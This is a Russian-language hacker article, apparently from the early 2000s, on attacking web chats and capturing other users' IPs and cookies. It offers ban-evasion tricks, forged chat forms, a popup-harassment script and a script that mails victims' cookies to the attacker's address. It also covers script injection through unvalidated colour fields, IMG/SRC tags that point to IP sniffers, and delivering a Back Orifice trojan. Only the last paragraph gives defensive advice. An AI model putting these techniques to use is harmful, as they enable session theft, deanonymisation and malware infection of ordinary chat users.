| div.main {margin-left: 20pt; margin-right: 20pt}Узнаём IP чатеров или очередное западло. 
             Введение
 До того, как рассмотреть 
            нижеследующее, я хотел бы рассказать еще кое-что о чатах. На этот 
            раз это будет не описанное в предыдущей статье физичекое устройство, 
            а скорее факторы риска. Итак, на мой взгляд, все чаты можно 
            разделить по уровню защиты на 4 уровня:
 1) Админа нет 
            вообще - делайте что хотите=)
 2) Админ вроде и есть, но фиговый 
            или временно ушел покурить - аналогично, но побыстрее, пока он не 
            вернулся или до него не дошло, что вы там собираетесь делать;)
 3) 
            Админ есть, но защита слабовата - рисует только IP - юзайте 
            анонимную проксю и меняйте ее, если что нехорошее случится...
 4) 
            Админ есть, защита сильна - рисует вдобавок к IP и домен... Это не 
            есть карашоу, это тяжелее... Но в принципе решается это дело тоже до 
            гениального просто - подключаетесь через другого провайдера (через 
            связь которого вас не выкидывали), заходите на сайт, отключаетесь и 
            подключаетесь снова через первого. Все будет нормалек, а если вдруг 
            опять выкинут - просто повторите всю шутку заново=)
 
 И 
            еще - если что-то все-таки произошло и в чат вас не пускают никаким 
            образом - попробуйте подчистить кукисы=)
 
 Обзор вариантов западла в 
            чатах
 
 Основным методом взлома чатов является 
            сохранение той формы, которую вы видите, заходя на сервак, на 
            собственный хард, и изменения формы путем прописки полных адресов и 
            замены строк типа <input type=hidden name= cookie 
            value=SP202134> на <input type=text name=cookie 
            value=SP202134> и последующей сборки окна чата из реальных и 
            сохраненных фреймов. Делается это обычно 
            так:
 
 <html>
 <frameset 
            rows="80%,20%">
 <frameset cols="70%,30%">
 <frame 
            name="razg" 
            src="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end">
 <frame 
            name="rigt" 
            src="http://www.chat.nsk.su/right.html">
 </frameset>
 <frame 
            name="bot" 
            src="start.htm">
 </frameset>
 </html>
 
 Start.htm 
            - это и есть тот фрейм который нужно сохранить и 
            изменить.
 
 Что это дает??? Возможность обойти 
            зарегистрированные имена и сокрытие своего IP за чужим ID от 
            киллеров. В дальнейшем над этой формой надо еще слегка поизвращаться 
            и довести ее до ума, чтоб сделать отправку скриптов в общий фрейм 
            легкой и приятной... Да, кстати, одной из возможных фенек является 
            прописка скрипта в информацию о себе, которую вы даете при 
            регистрации... Представьте только, как здорово - вы просто 
            регистрируетесь, а каждый чел, который захочет глянуть вашу анкету, 
            получает широкий спектр возможных подлянок - от простого захламления 
            Рабочего стола ненужными окошками до впаривания трояна (где-то 
            посерединке находится и получение IP или кукисов=) для примера 
            привожу известный всем (вдруг не всем?) скрипт ЗАРАЗЫ aka Ученого 
            Кота:
 
 <script>
 for( I=1 ; I<=11 ; I++ 
            )
 {
 if( I==1 ) alert( "Че те надо?????" );
 else alert( "Я 
            тя " + ( (I==11)? "последни" : I ) + "й раз спрашиваю - че те 
            надо???" );
 }
 alert("а здесь все равно нету 
            нифика...");
 top.frames['Inform'].document.forms[0].Accent.options[31].selected 
            = 1;
 top.frames['Inform'].document.forms[0].Announce.value = "Я 
            люблю тебя, 
            3APA3A!";
 top.frames['Inform'].document.forms[0].submit();
 top.frames['Dark'].document.forms[2].submit();
 </script>
 
 Путем 
            нехитрой модификации скрипта можно добиться поразительных 
            результатов... Но признаюсь - я прописать скрипт в анкету не 
            пробовал - тем более что дырка эта уже почти везде закрыта и 
            регистрационные анкеты сначала просматривают админы...
 
 Есть 
            еще одна интересная штука:
 
 <script 
            language=javascript>
 var 
            cook=show_all_cookies();
 document.open("cookies",cook);
 document.write('<form 
            onsubmit="javascript:window.close();"
 method=post 
            action="mailto:my_mail@mail.ru"
 ENCTYPE="text/plain"><input 
            type=hidden
 name=h1 value=',cook,'><input type=submit 
            value="Нажмите чтобы 
            закрыть">
 </form>');
 document.close("cookies");
 </SCRIPT>
 
 Как 
            вы наверняка поняли, это западло, посылающее кукисы вашей жертвы вам 
            на мыло, попробуйте оптимизировать его. Кукисы - это вещь, там 
            хранится и IP жертвы, и ID в чате, и много всего остального, 
            полезного-преполезного=)) Но, кстати, есть один минус - вы светите 
            свое мыло (в примере, как вы поняли, 
            my_mail@mail.ru)
 
 Модифицируют форму обычно следующим 
            образом: в очень многих чатах, где посетителю позволяют выбрать цвет 
            или размер текста, как правило, вводимые им значения цвета не 
            проверяются, можно, например, в качестве цвета вместо любимого 
            значения 'black' задать '><script' (если тег печатается в чате 
            как <FONT COLOR=black> Если печатаются кавычки 
            (COLOR="black"), то задача несильно усложняется - надо всего лишь их 
            нейтрализовать, например '"><script p="'=) Как правило, тип 
            шрифта указывается непосредственно перед фразой введенной 
            посетителем. Так что в своей фразе вы теперь смело можете писать 
            любой скрипт! Так мы имеем возможность закинуть Javascript в общее 
            окно чата, что открывает обширные возможности... Но нужно отметить 
            что засунуть закрывающий тег тоже может быть достаточно сложно, а 
            без этого скрипт работать не будет. Впрочем, иногда скрипт просто 
            удается засунуть в COLOR целиком.
 
 Итак, путем, 
            предназначенным для заподлянства в чате, в том числе и кражи IP, 
            служит использование разрешенных тегов (в большинстве чатов теги 
            вроде <script> естейственно запрещены, и обычно отправка 
            скрипта осуществляется путем использования тега BGSOUND, EMBED, 
            OBJECT, DIV и т.д., обычно это выглядит так: <IMG 
            SRC="*****.js">)для своих темных целей;-) Именно таким путем 
            работают снифферы, например знаменитый чат-сниффер хакзоны, да и мои 
            недалеко ушли, с той только разницей, что лог ведется в другом 
            месте... Самым простым способом является указание на чей-нибудь 
            сниффер в теге SRC непосредственно в общем окне (как все помнят, 
            данный тег выполняется на машине, никого не спрашивая, если только 
            просмотр картинок не отключен) - и все IP у вас в кармане. 
            Рекомендую - зайдите на какой нибудь простенький, но со вкусом чат, 
            покопайтесь в исходнике фреймов, все что можно слейте себе на хард, 
            полистайте книги и напишите свой сниффер - как гласит одно из 
            определений словечка "хакер" - это такой странный человек, которому 
            больше нравится писать свои программы, чем использовать чужие=) 
            Именно по этой причине я не даю ни одной ссылки на существующие в 
            сети снифферы и не даю окончательных, применяемых мной вариантов 
            приведенных скриптов - дорабатывайте сами, труд, батенька, 
            облагораживает человека, нужно учиться, учиться и еще раз учиться, 
            как завещал великий Ленин, а не переписывать чужие скрипты - это вам 
            в голове ничего не прибавит... Мне конечно скриптов не жалко, но 
            разозлили меня откликами на предыдущую статью (набросок имею в виду, 
            где я оказался ЛАМЕРом aka ДЕБИЛом=) порядком, так что звиняйте, 
            хлопцы, бананьев нэма... Но, все-таки, если людям захочется - я 
            ОБЕЩАЮ третью статью, где опубликую все окончательные результаты 
            МОИХ исследований на тему взломов чата и защиты в чате (здесь же и 
            ИРКа будет, наверно, приплетена, идеи и наброски на эту тему уже 
            есть...)Так что думайте. А пока продолжаем.
 
 Многих 
            интересует вопрос - а почему сниффера или трояна обычно запускают из 
            сети, а не с своего компьютера? Нельзя, мол, что ли??? Можно!!! 
            Адрес для запуска должен выглядеть так: 127.0.0.1/c:bo.exe где, что 
            и ежу понятно, 127.0.0.1 - IP компа, у которого прямо на диске С 
            хранится ваш любимый BO... Аналогично может впариваться любая другая 
            примочка, включая скрипты и все прочее... Вот так 
            вот.
 
 Теперь несколько слов о том, как защититься от 
            всего того, что я тут расписал - прежде всего, перед заходом на чат 
            отключите отображение картинок, если кто не знает как - в IE 
            СервисСвойства обозревателяВкладка "Дополнительно", в разделе 
            "Мультимедиа" снять галочку с "Отображать рисунки" - вы ничего не 
            потеряете, в нужное время нужную картинку можно легко рассмотреть, 
            кликнув правой кнопкай и выбрав "Показать рисунок". Во-вторых - не 
            ходите на ссылки, которые вам дают в чате, если не уверены на 100%, 
            что это именно то, что вам нужно. В-третьих - юзайте анонимную 
            проксю. В-четвертых - если возможно, то отключите для отображения 
            все теги, с помощью которых на вашей машине может быть запущен 
            скрипт. В-пятых - пользуйтесь презервативами... ой, кажется это из 
            другой оперы!;-)
 Автор: S1Y_T00R
 
 |